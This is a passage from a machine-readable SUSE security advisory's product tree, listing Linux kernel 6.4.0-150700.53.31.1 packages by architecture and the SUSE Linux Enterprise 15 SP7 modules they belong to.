"name": "dtb-amazon-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-amazon-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-amazon-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-amd-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-amd-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-amd-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-amlogic-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-amlogic-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-amlogic-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-apm-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-apm-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-apm-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-apple-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-apple-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-apple-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-arm-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-arm-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-arm-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-broadcom-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-broadcom-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-broadcom-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-cavium-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-cavium-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-cavium-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-exynos-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-exynos-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-exynos-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-freescale-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-freescale-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-freescale-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-hisilicon-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-hisilicon-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-hisilicon-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-lg-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-lg-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-lg-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-marvell-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-marvell-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-marvell-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-mediatek-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-mediatek-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-mediatek-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-nvidia-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-nvidia-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-nvidia-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-qcom-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-qcom-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-qcom-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-renesas-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-renesas-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-renesas-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-rockchip-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-rockchip-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-rockchip-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-socionext-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-socionext-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-socionext-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-sprd-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-sprd-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-sprd-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-xilinx-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-xilinx-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-xilinx-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-64kb-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "gfs2-kmp-64kb-6.4.0-150700.53.31.1.aarch64",
"product_id": "gfs2-kmp-64kb-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"product_id": "gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"product_id": "kernel-64kb-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"product_id": "kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-64kb-extra-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "kernel-64kb-extra-6.4.0-150700.53.31.1.aarch64",
"product_id": "kernel-64kb-extra-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-64kb-optional-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "kernel-64kb-optional-6.4.0-150700.53.31.1.aarch64",
"product_id": "kernel-64kb-optional-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "kernel-default-6.4.0-150700.53.31.1.aarch64",
"product_id": "kernel-default-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"product": {
"name": "kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"product_id": "kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-base-rebuild-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"product": {
"name": "kernel-default-base-rebuild-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"product_id": "kernel-default-base-rebuild-6.4.0-150700.53.31.1.150700.17.21.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"product_id": "kernel-default-devel-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-extra-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "kernel-default-extra-6.4.0-150700.53.31.1.aarch64",
"product_id": "kernel-default-extra-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "kernel-default-livepatch-6.4.0-150700.53.31.1.aarch64",
"product_id": "kernel-default-livepatch-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-optional-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "kernel-default-optional-6.4.0-150700.53.31.1.aarch64",
"product_id": "kernel-default-optional-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "kernel-kvmsmall-6.4.0-150700.53.31.1.aarch64",
"product_id": "kernel-kvmsmall-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-devel-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "kernel-kvmsmall-devel-6.4.0-150700.53.31.1.aarch64",
"product_id": "kernel-kvmsmall-devel-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"product_id": "kernel-obs-build-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-obs-qa-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "kernel-obs-qa-6.4.0-150700.53.31.1.aarch64",
"product_id": "kernel-obs-qa-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-syms-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "kernel-syms-6.4.0-150700.53.31.1.aarch64",
"product_id": "kernel-syms-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-64kb-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "kselftests-kmp-64kb-6.4.0-150700.53.31.1.aarch64",
"product_id": "kselftests-kmp-64kb-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-default-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "kselftests-kmp-default-6.4.0-150700.53.31.1.aarch64",
"product_id": "kselftests-kmp-default-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-64kb-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "ocfs2-kmp-64kb-6.4.0-150700.53.31.1.aarch64",
"product_id": "ocfs2-kmp-64kb-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"product_id": "ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "reiserfs-kmp-64kb-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "reiserfs-kmp-64kb-6.4.0-150700.53.31.1.aarch64",
"product_id": "reiserfs-kmp-64kb-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"product_id": "reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-devel-6.4.0-150700.53.31.1.noarch",
"product": {
"name": "kernel-devel-6.4.0-150700.53.31.1.noarch",
"product_id": "kernel-devel-6.4.0-150700.53.31.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-docs-6.4.0-150700.53.31.1.noarch",
"product": {
"name": "kernel-docs-6.4.0-150700.53.31.1.noarch",
"product_id": "kernel-docs-6.4.0-150700.53.31.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-docs-html-6.4.0-150700.53.31.1.noarch",
"product": {
"name": "kernel-docs-html-6.4.0-150700.53.31.1.noarch",
"product_id": "kernel-docs-html-6.4.0-150700.53.31.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-macros-6.4.0-150700.53.31.1.noarch",
"product": {
"name": "kernel-macros-6.4.0-150700.53.31.1.noarch",
"product_id": "kernel-macros-6.4.0-150700.53.31.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-source-6.4.0-150700.53.31.1.noarch",
"product": {
"name": "kernel-source-6.4.0-150700.53.31.1.noarch",
"product_id": "kernel-source-6.4.0-150700.53.31.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-source-vanilla-6.4.0-150700.53.31.1.noarch",
"product": {
"name": "kernel-source-vanilla-6.4.0-150700.53.31.1.noarch",
"product_id": "kernel-source-vanilla-6.4.0-150700.53.31.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"product_id": "cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le"
}
},
{
"category": "product_version",
"name": "dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"product_id": "dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"product_id": "gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "kernel-default-6.4.0-150700.53.31.1.ppc64le",
"product_id": "kernel-default-6.4.0-150700.53.31.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"product": {
"name": "kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"product_id": "kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-base-rebuild-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"product": {
"name": "kernel-default-base-rebuild-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"product_id": "kernel-default-base-rebuild-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"product_id": "kernel-default-devel-6.4.0-150700.53.31.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-extra-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "kernel-default-extra-6.4.0-150700.53.31.1.ppc64le",
"product_id": "kernel-default-extra-6.4.0-150700.53.31.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"product_id": "kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"product_id": "kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-optional-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "kernel-default-optional-6.4.0-150700.53.31.1.ppc64le",
"product_id": "kernel-default-optional-6.4.0-150700.53.31.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "kernel-kvmsmall-6.4.0-150700.53.31.1.ppc64le",
"product_id": "kernel-kvmsmall-6.4.0-150700.53.31.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-devel-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "kernel-kvmsmall-devel-6.4.0-150700.53.31.1.ppc64le",
"product_id": "kernel-kvmsmall-devel-6.4.0-150700.53.31.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"product_id": "kernel-obs-build-6.4.0-150700.53.31.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-obs-qa-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "kernel-obs-qa-6.4.0-150700.53.31.1.ppc64le",
"product_id": "kernel-obs-qa-6.4.0-150700.53.31.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"product_id": "kernel-syms-6.4.0-150700.53.31.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "kselftests-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"product_id": "kselftests-kmp-default-6.4.0-150700.53.31.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"product_id": "ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le"
}
},
{
"category": "product_version",
"name": "reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"product": {
"name": "reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"product_id": "reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"product": {
"name": "cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"product_id": "cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x"
}
},
{
"category": "product_version",
"name": "dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"product": {
"name": "dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"product_id": "dlm-kmp-default-6.4.0-150700.53.31.1.s390x"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"product": {
"name": "gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"product_id": "gfs2-kmp-default-6.4.0-150700.53.31.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-6.4.0-150700.53.31.1.s390x",
"product": {
"name": "kernel-default-6.4.0-150700.53.31.1.s390x",
"product_id": "kernel-default-6.4.0-150700.53.31.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"product": {
"name": "kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"product_id": "kernel-default-devel-6.4.0-150700.53.31.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-extra-6.4.0-150700.53.31.1.s390x",
"product": {
"name": "kernel-default-extra-6.4.0-150700.53.31.1.s390x",
"product_id": "kernel-default-extra-6.4.0-150700.53.31.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"product": {
"name": "kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"product_id": "kernel-default-livepatch-6.4.0-150700.53.31.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"product": {
"name": "kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"product_id": "kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-optional-6.4.0-150700.53.31.1.s390x",
"product": {
"name": "kernel-default-optional-6.4.0-150700.53.31.1.s390x",
"product_id": "kernel-default-optional-6.4.0-150700.53.31.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"product": {
"name": "kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"product_id": "kernel-obs-build-6.4.0-150700.53.31.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-obs-qa-6.4.0-150700.53.31.1.s390x",
"product": {
"name": "kernel-obs-qa-6.4.0-150700.53.31.1.s390x",
"product_id": "kernel-obs-qa-6.4.0-150700.53.31.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-syms-6.4.0-150700.53.31.1.s390x",
"product": {
"name": "kernel-syms-6.4.0-150700.53.31.1.s390x",
"product_id": "kernel-syms-6.4.0-150700.53.31.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"product": {
"name": "kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"product_id": "kernel-zfcpdump-6.4.0-150700.53.31.1.s390x"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-default-6.4.0-150700.53.31.1.s390x",
"product": {
"name": "kselftests-kmp-default-6.4.0-150700.53.31.1.s390x",
"product_id": "kselftests-kmp-default-6.4.0-150700.53.31.1.s390x"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"product": {
"name": "ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"product_id": "ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x"
}
},
{
"category": "product_version",
"name": "reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"product": {
"name": "reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"product_id": "reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"product_id": "cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"product_id": "dlm-kmp-default-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"product_id": "gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "kernel-default-6.4.0-150700.53.31.1.x86_64",
"product_id": "kernel-default-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"product": {
"name": "kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"product_id": "kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-base-rebuild-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"product": {
"name": "kernel-default-base-rebuild-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"product_id": "kernel-default-base-rebuild-6.4.0-150700.53.31.1.150700.17.21.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"product_id": "kernel-default-devel-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-extra-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "kernel-default-extra-6.4.0-150700.53.31.1.x86_64",
"product_id": "kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"product_id": "kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"product_id": "kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-optional-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "kernel-default-optional-6.4.0-150700.53.31.1.x86_64",
"product_id": "kernel-default-optional-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-vdso-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "kernel-default-vdso-6.4.0-150700.53.31.1.x86_64",
"product_id": "kernel-default-vdso-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "kernel-kvmsmall-6.4.0-150700.53.31.1.x86_64",
"product_id": "kernel-kvmsmall-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-devel-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "kernel-kvmsmall-devel-6.4.0-150700.53.31.1.x86_64",
"product_id": "kernel-kvmsmall-devel-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-vdso-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "kernel-kvmsmall-vdso-6.4.0-150700.53.31.1.x86_64",
"product_id": "kernel-kvmsmall-vdso-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"product_id": "kernel-obs-build-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-obs-qa-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "kernel-obs-qa-6.4.0-150700.53.31.1.x86_64",
"product_id": "kernel-obs-qa-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-syms-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "kernel-syms-6.4.0-150700.53.31.1.x86_64",
"product_id": "kernel-syms-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-default-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "kselftests-kmp-default-6.4.0-150700.53.31.1.x86_64",
"product_id": "kselftests-kmp-default-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"product_id": "ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64"
}
},
{
"category": "product_version",
"name": "reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"product": {
"name": "reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"product_id": "reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-basesystem:15:sp7"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-development-tools:15:sp7"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Legacy 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Legacy 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Legacy 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-legacy:15:sp7"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp7"
}
}
},
{
"category": "product_name",
